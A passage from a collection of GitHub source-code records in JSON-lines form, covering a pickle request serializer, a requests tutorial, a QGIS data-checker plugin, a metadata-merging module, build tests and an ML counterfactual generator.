pickle.dumps(object)\n    hash_code = hash_code_hex(object_bytes)\n    envelope_bytes = pickle.dumps({\n        'operation': 'PUT',\n        'id': hash_code,\n        'payload': object\n    })\n    return envelope_bytes, hash_code\n\n\n# serialize GET request\ndef serialize_GET(id):\n    envelope_bytes = pickle.dumps({\n        'operation': 'GET',\n        'id': id\n    })\n    return envelope_bytes, id\n\n\n# serialize DELETE request\ndef serialize_DELETE(id):\n    envelope_bytes = pickle.dumps({\n        'operation': 'DELETE',\n        'id': id\n    })\n    return envelope_bytes, id\n\n\ndef test():\n    data_bytes, hash_code = serialize_PUT({'user': 'Foo'})\n    print(f\"Data Bytes={data_bytes}\\nHash Code={hash_code}\")\n    data = deserialize(data_bytes)\n    print(data)\n\n\nif __name__ == \"__main__\":\n    test()\n","repo_name":"cipopic/LRU-Cache-and-Bloom-Filter","sub_path":"pickle_hash.py","file_name":"pickle_hash.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"37624197188","text":"import requests\n\nr = requests.get('https://www.baidu.com/')\nprint(type(r))\nprint(r.status_code)\nprint(type(r.text))\nprint(r.text)\nprint(r.cookies)\n\nr1 = requests.post('http://httpbin.org/post')\nr2 = requests.put('http://httpbin.org/put')\nr3 = requests.delete('http://httpbin.org/delete')\nr4 = requests.head('http://httpbin.org/get')\nr5 = requests.options('http://httpbin.org/get')\n\n\nr6 = requests.get('http://httpbin.org/get')\nprint(r6.text)\n\n\ndata = {\n    'name': 'germey',\n    'age': 22\n}\nr7 = requests.get('http://httpbin.org/get', params=data)\nprint(r7.text) # the response body is in JSON format\n\nr8 = requests.get('http://httpbin.org/get')\nprint(type(r8.text))\nprint(r8.json())\nprint(type(r8.json())) # convert the JSON response string into a dict\n\n\nimport re\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko)\\\n    Chrome/52.0.2743.116 Safari/537.36'\n}\nr9 = requests.get(\"https://www.zhihu.com/explore\", headers = headers)\npattern = re.compile('explore-feed.*?question_link.*?>(.*?)</a>', re.S)\ntitles = re.findall(pattern, r9.text)\nprint(titles)\n\n\nrA = requests.get('https://github.com/favicon.ico')\n# print(rA.text)\n# print(rA.content)\n\n# 'wb' opens the file for binary writing, so binary data can be written to it\n# images, audio and video files can all be fetched this way\nwith open('favicon.ico', 'wb') as f:\n    f.write(rA.content)\n\ndata1 = {'name': 'germey', 'age': '22'}\nrB = requests.post('http://httpbin.org/post', data=data1)\nprint(rB.text) # the data shows up in the form part of the response\nprint(rB.status_code, rB.headers, rB.cookies, rB.url, rB.history)\nexit() if not rB.status_code == requests.codes.ok else print('Request Successfully')\n\n","repo_name":"existenceE/into","sub_path":"basistoknowofpython/requeststest.py","file_name":"requeststest.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"1803893633","text":"import numpy as np\n\ndef getVector(mag, deg): # build the vector for a given magnitude and direction\n    vec = np.zeros(2)\n    vec[0] = mag*np.cos(deg*2*np.pi/360)\n    vec[1] = mag*np.sin(deg*2*np.pi/360)\n    return vec\n\ndef getMagDeg(vec): # compute the magnitude and direction of a vector\n    mag = np.sqrt(vec[0]*vec[0]+vec[1]*vec[1])\n    deg = np.arctan(vec[1]/vec[0]) * 360/(2*np.pi)\n    return mag, deg\n\nF1 = getVector(100, 30) # force of magnitude 100 N at 30 degrees\nF2 = getVector(120, 60) # force of magnitude 120 N at 60 degrees\nFsum = F1 + F2\nmagn, angle = getMagDeg(Fsum)\nprint(\"Magnitude of the summed force : \", magn)\nprint(\"Angle of the summed force : \", 
angle)\n","repo_name":"KeonMyungLee/applied-linear-algebra","sub_path":"Practice-Code/06장/prog6-1.py","file_name":"prog6-1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38155601371","text":"from typing import List\n\nimport torch\nfrom torch import nn\n\nfrom .decoders import MaskDecoder\nfrom .encoders import ImageEncoderViT, PromptEncoder\n\n\nclass Sam(nn.Module):\n mask_threshold: float = 0.0\n image_format: str = 'RGB'\n\n def __init__(\n self,\n image_encoder: ImageEncoderViT,\n prompt_encoder: PromptEncoder,\n mask_decoder: MaskDecoder,\n pixel_mean: List[float] = (123.675, 116.28, 103.53),\n pixel_std: List[float] = (58.395, 57.12, 57.375)\n ) -> None:\n \"\"\"\n SAM predicts object masks from an image and input prompts.\n\n Note:\n All forward() operations moved to SAMPredictor.\n\n Args:\n image_encoder (ImageEncoderViT): The backbone used to encode the image into image embeddings that allow for\n efficient mask prediction.\n prompt_encoder (PromptEncoder): Encodes various types of input prompts.\n mask_decoder (MaskDecoder): Predicts masks from the image embeddings and encoded prompts.\n pixel_mean (list(float)): Mean values for normalizing pixels in the input image.\n pixel_std (list(float)): Std values for normalizing pixels in the input image.\n \"\"\"\n super().__init__()\n self.image_encoder = image_encoder\n self.prompt_encoder = prompt_encoder\n self.mask_decoder = mask_decoder\n self.register_buffer('pixel_mean', torch.Tensor(pixel_mean).view(-1, 1, 1), False)\n self.register_buffer('pixel_std', torch.Tensor(pixel_std).view(-1, 1, 1), False)\n","repo_name":"RuningMangoPi/yolov8_QAT","sub_path":"ultralytics/ultralytics/models/sam/modules/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"3718304695","text":"'''\nCreated on 23 oct. 
2015\n\nUpdated on 11 may 2016\n\n@author: arxit\n'''\n\nimport os\n\nimport processing\nfrom processing.tools import *\n\nfrom qgis.core import *\nimport qgis.utils\nfrom PyQt4.QtGui import QAction\nfrom PyQt4.QtCore import QCoreApplication\n\nfrom PagLuxembourg.schema import *\nimport PagLuxembourg.main\n\nfrom error_summary_dialog import ErrorSummaryDialog\n\nclass DataChecker(object):\n '''\n Main class for the data checker widget\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n \n def run(self):\n '''\n Runs the widget\n \n :returns: True if there's no errors\n :rtype: Boolean\n '''\n \n project = PagLuxembourg.main.current_project\n \n if not project.isPagProject():\n return\n \n layer_structure_errors = list()\n data_errors = list()\n \n # 'MODIFICATION PAG' layer definition \n layer_PAG = project.getModificationPagLayer()\n \n # 'MODIFICATION PAG' selection definition\n selection_PAG = layer_PAG.selectedFeatures()\n \n # Counting number entities in 'MODIFICATION PAG' selection\n entity_count_PAG = layer_PAG.selectedFeatureCount()\n \n # Iterates through XSD types\n for type in PagLuxembourg.main.xsd_schema.types:\n layer = project.getLayer(type)\n \n if layer is None:\n continue\n \n warn_errors, fatal_errors = self.checkLayerStructure(layer, type)\n layer_structure_errors = layer_structure_errors + warn_errors + fatal_errors\n \n if len(fatal_errors)>0:\n continue\n \n layer_data_errors = self.checkLayerData(selection_PAG, layer, type)\n data_errors.append(layer_data_errors)\n \n # Flatten data errors\n data_errors_flat = list()\n for layer, errors in data_errors:\n for feature, field, message in errors:\n data_errors_flat.append((layer, feature, field, message))\n \n valid = (len(layer_structure_errors) + len(data_errors_flat)) == 0\n \n # Messages display for number of selected entities\n if valid and entity_count_PAG == 1:\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker','Success'),\n QCoreApplication.translate('DataChecker','No errors found on entities that intersect {} selected entity in MODIFICATION PAG layer').format(entity_count_PAG))\n elif valid and entity_count_PAG == 0 :\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker_no','Success'),\n QCoreApplication.translate('DataChecker_no','No errors found'))\n elif valid and entity_count_PAG > 1 :\n PagLuxembourg.main.qgis_interface.messageBar().clearWidgets()\n PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('DataChecker_many','Success'),\n QCoreApplication.translate('DataChecker_many','No errors found on entities that intersect {} selected entities in MODIFICATION PAG layer').format(entity_count_PAG))\n \n else:\n self.dlg = ErrorSummaryDialog(layer_structure_errors, data_errors)\n self.dlg.show()\n \n return valid \n \n # Datatype mapping allowed while checking. 
For a given XSD type, several QGIS types may be allowed or compatible\n XSD_QGIS_ALLOWED_DATATYPE_MAP = [(DataType.STRING, 'string'),\n (DataType.STRING, 'integer'),\n (DataType.STRING, 'double'),\n (DataType.INTEGER, 'integer'),\n (DataType.DOUBLE, 'double'),\n (DataType.DOUBLE, 'integer'),\n (DataType.DATE, 'date')]\n \n def checkLayerStructure(self, layer, xsd_type):\n '''\n Checks a layer structure against the XSD type\n Missing field, data type mismatch\n \n :param layer: The vector layer to check\n :type layer: QgsVectorLayer\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of warning and fatal errors\n :rtype: Tuple : warning, fatal. Layer (QgsVectorLayer), field (PAGField), message (str, QString)\n '''\n \n native_fields = PagLuxembourg.main.current_project.getNativeFields(xsd_type)\n warn_errors = list()\n fatal_errors = list()\n \n # Check geometry type\n if xsd_type.geometry_type is not None and XSD_QGIS_GEOMETRYTYPE_MAP[xsd_type.geometry_type] != layer.geometryType():\n fatal_errors.append((layer, None, QCoreApplication.translate('DataChecker','Geometry type mismatch, expected : {}').format(xsd_type.geometry_type)))\n \n # Check field structure\n for field in xsd_type.fields:\n # Check field missing\n if self._getNativeField(native_fields, field.name) is None:\n if field.nullable:\n warn_errors.append((layer, field, QCoreApplication.translate('DataChecker','Nullable field is missing')))\n else:\n warn_errors.append((layer, field, QCoreApplication.translate('DataChecker','Non nullable field is missing')))\n \n continue\n \n # Check field datatype (loop variables renamed so they do not shadow the xsd_type parameter)\n layer_field_name, layer_field_type = self._getNativeField(native_fields, field.name)\n found = False\n for allowed_xsd_type, allowed_qgis_type in self.XSD_QGIS_ALLOWED_DATATYPE_MAP:\n if layer_field_type == allowed_qgis_type and field.type == allowed_xsd_type:\n found = True\n break\n \n if not found:\n fatal_errors.append((layer, field, QCoreApplication.translate('DataChecker','Field datatype mismatch, expected : {}').format(field.type)))\n \n return warn_errors, fatal_errors\n \n def _getNativeField(self, fields, name):\n '''\n Get a native field from name\n '''\n for field in fields:\n if field[0] == name:\n return field\n \n return None\n \n def checkLayerData(self, selection_PAG, layer, xsd_type):\n '''\n Checks the data of a layer against the XSD type\n \n :param selection_PAG: Selected features from the Modification PAG layer\n :type selection_PAG: QgsFeatureList\n \n :param layer: The vector layer to check\n :type layer: QgsVectorLayer\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of data error\n :rtype: Tuples : Layer (QgsVectorLayer), list of tuple Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n areas = []\n \n # Check if a selection exists in 'MODIFICATION PAG'\n if len(selection_PAG) > 0:\n \n # Selection by intersection with 'MODIFICATION PAG' layer\n for PAG_feature in selection_PAG:\n cands = layer.getFeatures()\n for layer_features in cands:\n if PAG_feature.geometry().intersects(layer_features.geometry()):\n areas.append(layer_features.id())\n\n if layer.geometryType() == QGis.NoGeometry:\n layer.selectAll()\n else:\n layer.select(areas)\n selection_entities_from_PAG = layer.selectedFeatures()\n\n for feature in selection_entities_from_PAG:\n errors += self.checkFeatureData(feature, xsd_type)\n \n else:\n \n for feature in layer.dataProvider().getFeatures():\n errors += self.checkFeatureData(feature, xsd_type)\n \n return layer, errors\n \n def 
checkFeatureData(self, feature, xsd_type):\n '''\n Checks the data of a feature against the XSD type\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :param type: XSD schema type\n :type type: PAGType\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n # Check geometry\n if xsd_type.geometry_type is not None:\n errors += self.checkFeatureGeometry(feature)\n \n for field in feature.fields():\n xsd_field = xsd_type.getField(field.name())\n \n # Check if field exists in XSD\n if xsd_field is None:\n continue\n \n errors += self.checkFeatureFieldData(feature, xsd_field)\n \n return errors\n \n def checkFeatureFieldData(self, feature, xsd_field):\n '''\n Checks the data of a feature against the XSD type\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :param xsd_field: XSD type field\n :type xsd_field: PAGField\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n field_value = feature.attribute(xsd_field.name)\n \n # Check null value\n if field_value is None or field_value == NULL:\n if not xsd_field.nullable:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Null value in non nullable field')))\n \n return errors\n \n # Check numeric values\n if xsd_field.type in [DataType.INTEGER,DataType.DOUBLE]:\n numeric_value = float(field_value)\n \n # Check min value\n if xsd_field.minvalue is not None:\n min_value = float(xsd_field.minvalue)\n if numeric_value < min_value:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Value ({}) less than minimum value ({})').format(numeric_value, min_value)))\n \n # Check max value\n if xsd_field.maxvalue is not None:\n max_value = float(xsd_field.maxvalue)\n if numeric_value > max_value:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Value ({}) greater than maximum value ({})').format(numeric_value, max_value)))\n \n # Check string values\n if xsd_field.type == DataType.STRING:\n text_value = unicode(field_value)\n \n # Check value length\n if xsd_field.length is not None:\n text_length = len(text_value)\n max_length = int(xsd_field.length)\n if text_length > max_length:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Text length ({}) greater than field length ({})').format(text_length, max_length)))\n \n # Check enumeration\n if xsd_field.listofvalues is not None:\n if text_value not in xsd_field.listofvalues:\n errors.append((feature, xsd_field, QCoreApplication.translate('DataChecker','Text ({}) not in field list of values').format(text_value)))\n \n return errors\n \n def checkFeatureGeometry(self, feature):\n '''\n Checks the geometry of a feature\n \n :param feature: The feature to check\n :type feature: QgsFeature\n \n :returns: A list of error\n :rtype: List of tuples : Feature (QgsFeature), field (PAGField), message (str, QString)\n '''\n \n errors = list()\n \n if feature.geometry() is None or feature.geometry().isEmpty():\n errors.append((feature, None, QCoreApplication.translate('DataChecker','Geometry is empty')))\n else:\n errors2 = feature.geometry().validateGeometry()\n \n for error in errors2:\n errors.append((feature, None, error.what()))\n \n return 
errors","repo_name":"Geoportail-Luxembourg/qgis-pag-plugin","sub_path":"widgets/data_checker/data_checker.py","file_name":"data_checker.py","file_ext":"py","file_size_in_byte":12776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11520076877","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nfrom functional.fixture import tito\nfrom glob import glob\nfrom os.path import join\n\n\nclass BuildTitoTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n 'Run tito build before _all_ tests in this class.'\n self.output_dir = tempfile.mkdtemp(\"-titotestoutput\")\n os.chdir(os.path.abspath(join(__file__, '..', '..', '..')))\n self.artifacts = tito(\n 'build --rpm --test --output=%s --offline --no-cleanup --debug' %\n self.output_dir\n )\n\n @classmethod\n def tearDownClass(self):\n 'Clean up after _all_ tests in this class unless any test fails.'\n shutil.rmtree(self.output_dir)\n\n def test_build_tito(self):\n 'Tito creates three artifacts'\n self.assertEqual(3, len(self.artifacts))\n\n def test_find_srpm(self):\n 'One artifact is an SRPM'\n srpms = glob(join(self.output_dir, 'tito-*src.rpm'))\n self.assertEqual(1, len(srpms))\n\n def test_find_rpm(self):\n 'One artifact is a noarch RPM'\n rpms = glob(join(self.output_dir, 'noarch', 'tito-*noarch.rpm'))\n self.assertEqual(1, len(rpms))\n\n def test_find_tgz(self):\n 'One artifact is a tarball'\n tgzs = glob(join(self.output_dir, 'tito-*tar.gz'))\n self.assertEqual(1, len(tgzs))\n","repo_name":"rpm-software-management/tito","sub_path":"test/functional/build_tito_tests.py","file_name":"build_tito_tests.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"47"} +{"seq_id":"44159638331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nDefine classes and methods for working with resources extracted from blog.\n\nThis module defines the following classes:\n\n * Resource: Extracts and represents key information about a web resource.\n\"\"\"\n\nimport copy\nimport datetime\nimport io\nimport json\nimport logging\nimport pprint\nimport sys\n\nfrom wikidata_suggest import suggest\n\nPROVENANCE_VERBS = {\n 'citesAsMetadataDocument': 'http://purl.org/spar/cito/citesAsMetadataDocument',\n 'citesAsDataSource': 'http://purl.org/spar/cito/citesAsDataSource',\n 'hasWorkflowMotif': 'http://purl.org/net/wf-motifs#hasWorkflowMotif',\n 'Combine': 'http://purl.org/net/wf-motifs#Combine'\n}\n\nclass Resource:\n \"\"\"Store, manipulate, and export data about a single information resource.\"\"\"\n\n def __init__(self):\n \"\"\"Set all attributes to default values.\"\"\"\n\n self.authors = []\n self.contributors = []\n self.description = None\n self.domain = None\n self.editors = []\n self.end_date = None\n self.extent = None\n self.form = None\n self.frequency = None\n self.identifiers = {}\n self.is_part_of = None\n self.issue = None\n self.issuance = None\n self.issued_dates = None\n self.keywords = []\n self.languages = []\n self.places = []\n self.provenance = []\n self.publishers = []\n self.related_resources = []\n self.responsibility = []\n self.start_date = None\n self.subordinate_resources = []\n self.title = None\n self.title_alternates = []\n self.title_extended = None\n self.type = None\n self.url = None\n self.url_alternates = []\n self.volume = None\n self.year = None\n self.zenon_id = None\n self.zotero_id = None\n\n def json_dumps(self, formatted=False):\n 
\"\"\"Dump resource to JSON as a UTF-8 string.\"\"\"\n\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n dump = self.__dict__.copy()\n for k,v in dump.iteritems():\n logger.debug(\"{0} ({1})\".format(k, type(v)))\n if formatted:\n return json.dumps(dump, indent=4, sort_keys=True, ensure_ascii=False).encode('utf8')\n else:\n return json.dumps(dump, ensure_ascii=False).encode('utf8')\n\n def json_dump(self, filename, formatted=False):\n \"\"\"Dump resource as JSON to a UTF-8 encoded file.\"\"\"\n dumps = self.json_dumps(formatted) # get utf8-encoded JSON dump\n with open(filename, 'w') as f:\n f.write(dumps)\n del dumps\n\n\n def json_loads(self, s):\n \"\"\"Parse resource from a UTF-8 JSON string.\"\"\"\n self.__dict__ = json.loads(unicode(s))\n\n def json_load(self, filename):\n \"\"\"Parse resource from a json file.\"\"\"\n with io.open(filename, 'r', encoding='utf8') as f:\n self.__dict__ = json.load(f)\n\n def package(self):\n \"\"\"Return a summary package of resource information.\"\"\"\n pkg = {}\n try:\n title = self.extended_title\n except AttributeError:\n title = self.title\n pkg['title_full'] = title\n pkg['url'] = self.url\n if title != self.title:\n pkg['title'] = self.title\n return pkg\n\n\n def zotero_add(self, zot, creds, extras={}):\n \"\"\"Upload as a record to Zotero.\"\"\"\n\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n try:\n issn = self.identifiers['issn']\n except KeyError:\n if 'journal' in self.keywords:\n zot_type = 'journalArticle'\n else:\n zot_type = 'webpage'\n else:\n zot_type = 'journalArticle'\n template = zot.item_template(zot_type)\n template['abstractNote'] = self.description\n if 'issn' in locals():\n template['issn'] = issn\n template['tags'] = self.keywords\n template['extra'] = ', '.join([':'.join((k,'\"{0}\"'.format(v))) for k,v in extras.iteritems()])\n try:\n template['language'] = self.language[0]\n except TypeError:\n pass\n template['title'] = self.title\n template['url'] = self.url\n resp = zot.create_items([template])\n try:\n zot_id = resp[u'success'][u'0']\n logger.debug(\"zot_id: {0}\".format(zot_id))\n except KeyError:\n logger.error('Zotero upload appears to have failed with {0}'.format(repr(resp)))\n raise\n else:\n self.zotero_id = {\n 'libraryType': creds['libraryType'],\n 'libraryID': creds['libraryID'],\n 'itemID': zot_id\n }\n logger.debug(repr(self.zotero_id))\n\n def wikidata_suggest(self, resource_title):\n wikidata = suggest(resource_title)\n if wikidata:\n return wikidata['id']\n else:\n return None\n\n def set_provenance(self, object, verb='citesAsMetadataDocument', object_date=None, fields=None):\n \"\"\"Add an entry to the provenance list.\"\"\"\n\n d = {\n 'term': PROVENANCE_VERBS[verb],\n 'when': datetime.datetime.utcnow().isoformat(),\n 'resource': object\n }\n if object_date is not None:\n d['resource_date'] = object_date\n if fields is not None:\n if fields is list:\n d['fields'] = fields\n else:\n d['fields'] = list(fields)\n self.provenance.append(d)\n\n def __str__(self):\n return pprint.pformat(self.__dict__, indent=4, width=120)\n\n\ndef merge(r1, r2):\n \"\"\"Merge two resources into oneness.\"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n r3 = Resource()\n modified_fields = []\n k1 = r1.__dict__.keys()\n k2 = r2.__dict__.keys()\n all_keys = list(set(k1 + k2))\n domain = r1.domain\n for k in all_keys:\n modified = False\n v3 = None\n try:\n v1 = copy.deepcopy(r1.__dict__[k])\n except KeyError:\n v1 = None\n try:\n v2 = copy.deepcopy(r2.__dict__[k])\n except 
KeyError:\n v2 = None\n\n if k in ['url',]:\n if v1 != v2:\n if v1.startswith(v2):\n v3 = v2\n r3.__dict__['url_alternates'].append(v1)\n elif v2.startswith(v1):\n v3 = v1\n r3.__dict__['url_alternates'].append(v2)\n else:\n protocol1, path1 = v1.split('://')\n protocol2, path2 = v2.split('://')\n if path1 == path2 and (protocol1 == 'https' or protocol2 == 'https'):\n v3 = 'https://' + path1\n else:\n raise ValueError(u'could not reconcile url mismatch in merge: {1} vs. {2}'.format(k, v1, v2))\n else:\n v3 = v1\n else:\n modified = True\n if v1 is None and v2 is None:\n v3 = None\n modified = False\n # prefer some data over no data\n elif v1 is None and v2 is not None:\n v3 = v2\n elif v1 is not None and v2 is None:\n v3 = v1\n elif k == 'is_part_of':\n if v1 == v2:\n v3 = v1\n modified = False\n else:\n if domain in v1['url']:\n v3 = v1\n elif domain in v2['url']:\n v3 = v2\n elif 'issn' in v1.keys() and not('issn' in v2.keys()):\n v3 = v1\n elif 'issn' in v2.keys() and not('issn' in v1.keys()):\n v3 = v2\n else:\n v3 = None\n elif k in ['volume', 'year', 'zenon_id', 'issue', 'zotero_id']:\n if v1 == v2:\n v3 = v1\n modified = False\n elif v1 is None and v1 is not None:\n v3 = v2\n elif v1 is not None and v2 is None:\n v3 = v1\n else:\n raise ValueError(u'cannot merge two resources in which the {0} field differs: \"{1}\" vs. \"{2}\"'.format(k, v1, v2))\n elif k == 'languages':\n if len(v1) == 0 and len(v2) > 0:\n v3 = copy.deepcopy(v2)\n elif len(v1) > 0 and len(v2) == 0:\n v3 = copy.deepcopy(v1)\n elif len(v1) > 0 and len(v2) > 0:\n v3 = list(set(v1 + v2))\n else:\n v3 = []\n elif k == 'identifiers':\n if len(v1) == 0 and len(v2) > 0:\n v3 = copy.deepcopy(v2)\n elif len(v1) > 0 and len(v2) == 0:\n v3 = copy.deepcopy(v1)\n elif len(v1) > 0 and len(v2) > 0:\n v3 = {}\n idfams = list(set(v1.keys() + v2.keys()))\n for idfam in idfams:\n thisval1 = None\n thisval2 = None\n try:\n thisval1 = v1[idfam]\n except KeyError:\n pass\n try:\n thisval2 = v2[idfam]\n except KeyError:\n pass\n if type(thisval1) == list or type(thisval2) == list:\n v3[idfam] = []\n if thisval1 is not None:\n v3[idfam].extend(thisval1)\n if thisval2 is not None:\n v3[idfam].extend(thisval2)\n v3[idfam] = list(set(v3[idfam]))\n elif type(thisval1) == dict or type(thisval2) == dict:\n if thisval1 is None and thisval2 is not None:\n v3 = copy.deepcopy(v2)\n elif thisval1 is not None and thisval2 is None:\n v3 = copy.deepcopy(v1)\n else:\n v3[idfam] = {}\n idtypes = list(set(thisval1.keys() + thisval2.keys()))\n for idtype in idtypes:\n thissubval1 = None\n thissubval2 = None\n try:\n thissubval1 = v1[idfam][idtype]\n except KeyError:\n pass\n try:\n thissubval2 = v2[idfam][idtype]\n except KeyError:\n pass\n v3[idfam][idtype] = []\n if thissubval1 is not None:\n v3[idfam][idtype].extend(thissubval1)\n if thissubval2 is not None:\n v3[idfam][idtype].extend(thissubval2)\n v3[idfam][idtype] = list(set(v3[idfam][idtype]))\n else:\n v3 = {}\n\n elif k in ['subordinate_resources', 'related_resources']:\n if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = v1 + v2\n seen = []\n for v3_child in v3:\n if v3_child['url'] in seen:\n del(v3_child)\n else:\n seen.append(v3_child['url'])\n del(seen)\n elif k == 'provenance':\n modified = False\n v3 = v1 + v2\n elif type(v1) == list and type(v2) == list:\n if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = []\n elif len(v1) == 0 and len(v2) > 0:\n v3 = v2\n elif len(v1) > 0 and len(v2) == 0:\n v3 = v1\n else:\n v3 = list(set(v1 + v2))\n elif type(v1) in [unicode, str]:\n 
if len(v1) == 0 and len(v2) == 0:\n modified = False\n v3 = v1\n elif v1 == v2:\n modified = False\n v3 = v1\n # if one contains the other, prefer the container\n elif v1 in v2:\n v3 = v2\n elif v2 in v1:\n v3 = v1\n # prefer the longer of the two\n elif len(v1) > len(v2):\n v3 = v1\n else:\n v3 = v2\n else:\n raise Exception\n r3.__dict__[k] = v3\n if modified:\n modified_fields.append(k)\n r3.set_provenance('http://purl.org/net/wf-motifs#Combine', 'hasWorkflowMotif', fields=modified_fields)\n return r3\n\n\ndef scriptinfo():\n '''\n Returns a dictionary with information about the running top level Python\n script:\n ---------------------------------------------------------------------------\n dir: directory containing script or compiled executable\n name: name of script or executable\n source: name of source code file\n ---------------------------------------------------------------------------\n \"name\" and \"source\" are identical if and only if running interpreted code.\n When running code compiled by py2exe or cx_freeze, \"source\" contains\n the name of the originating Python script.\n If compiled by PyInstaller, \"source\" contains no meaningful information.\n '''\n\n import os, sys, inspect\n #---------------------------------------------------------------------------\n # scan through call stack for caller information\n #---------------------------------------------------------------------------\n for teil in inspect.stack():\n # skip system calls\n if teil[1].startswith(\"<\"):\n continue\n if teil[1].upper().startswith(sys.exec_prefix.upper()):\n continue\n trc = teil[1]\n\n # trc contains highest level calling script name\n # check if we have been compiled\n if getattr(sys, 'frozen', False):\n scriptdir, scriptname = os.path.split(sys.executable)\n return {\"dir\": scriptdir,\n \"name\": scriptname,\n \"source\": trc}\n\n # from here on, we are in the interpreted case\n scriptdir, trc = os.path.split(trc)\n # if trc did not contain directory information,\n # the current working directory is what we need\n if not scriptdir:\n scriptdir = os.getcwd()\n\n scr_dict = {\"name\": trc,\n \"source\": trc,\n \"dir\": scriptdir}\n return scr_dict\n\n","repo_name":"DigiClass/COACS","sub_path":"awol_python3/isaw/awol/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":15102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"43597331577","text":"\"\"\"\nBased on https://github.com/valentyn1boreiko/SVCEs_code by Valentyn Boreiko.\n\"\"\"\nimport sys\nsys.path.append('../')\n\nimport os\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom neural_pca.adversarial_attacks.act_apgd import ActivationAPGDAttack\nfrom neural_pca import data  # imported as `data`, which is how the helpers below reference it\n\ndef generate_feature_counterfactuals(\n model,\n images,\n last_layer,\n eigenvectors,\n target_cls,\n norm,\n eps,\n steps,\n perturbation_targets,\n device,\n seed,\n n_restarts=1,\n x_init=None,\n reg_other=1.0,\n result_path=None,\n return_losses=False,\n loss='obj',\n ica_components=None,\n ica_mean=None,\n minimize=False,\n minimize_abs=False):\n \"\"\"\n Args:\n model: PyTorch model used to generate the counterfactuals.\n images: torch.Tensor, N x C x H x W, Original images\n last_layer: torch.nn.Module, last layer of the model\n eigenvectors: eigenvectors corresponding to principal components in the weighted last-layer activation space\n target_cls: determines which weights are used for the weighted activations
\n norm: str in [\"L2\", \"L1\", \"Linf\"], norm used for the adversarial attacks\n eps: float, epsilon used for the adversarial attacks\n steps: int, number of steps used for the adversarial attacks\n perturbation_targets: torch.Tensor(dtype=torch.long), N x N_targets, contains N_targets\n perturbation targets (indices of principal components of weighted last layer activations) \n for each image in images\n device: torch.device, CUDA device used for the generation\n seed: integer, random seed\n n_restarts: integer, number of restarts used in the adversarial attack (right now only supported for AFW and APGDs)\n x_init: torch.Tensor, N x C x H x W, Initialization for the adversarial perturbation. If 'None', the perturbations are initialized randomly.\n result_path: str, Path for saving the counterfactuals. If 'None', the counterfactuals are returned instead.\n return_losses: bool, If True, the loss values are returned as well\n \"\"\"\n assert loss in ['obj', 'obj_full', 'ce', 'ce_abs', 'log_nll', 'soft_log_nll', 'min_other', 'min_other_eig', 'max_comp_conf']\n \n bs = images.shape[0]\n if perturbation_targets.shape[0] > bs:\n perturbation_targets = perturbation_targets[:bs]\n \n with torch.no_grad():\n model.to(device)\n images = images.to(device)\n perturbation_targets = perturbation_targets.to(device)\n\n if result_path is not None:\n torch.save(images, result_path + \"/original_images.pt\")\n \n adv_attack = ActivationAPGDAttack(\n model, \n eps=eps, \n n_iter=steps, \n norm=norm, \n loss=loss, \n n_restarts=n_restarts, \n verbose=False, \n seed=seed,\n last_layer=last_layer,\n eigenvecs=eigenvectors,\n target_cls=target_cls,\n device=device,\n reg_other=reg_other,\n ica_components=ica_components,\n ica_mean=ica_mean,\n minimize=minimize,\n minimize_abs=minimize_abs)\n\n losses = [] if return_losses else None\n cfs = None\n if return_losses:\n adv_samples, attack_loss = adv_attack.perturb(\n images,\n perturbation_targets, \n best_loss=True,\n x_init=x_init)\n adv_samples, attack_loss = adv_samples.detach(), attack_loss.detach()\n losses.append(attack_loss)\n else:\n adv_samples = adv_attack.perturb(\n images,\n perturbation_targets, \n best_loss=True,\n x_init=x_init)[0].detach()\n \n if result_path is not None:\n 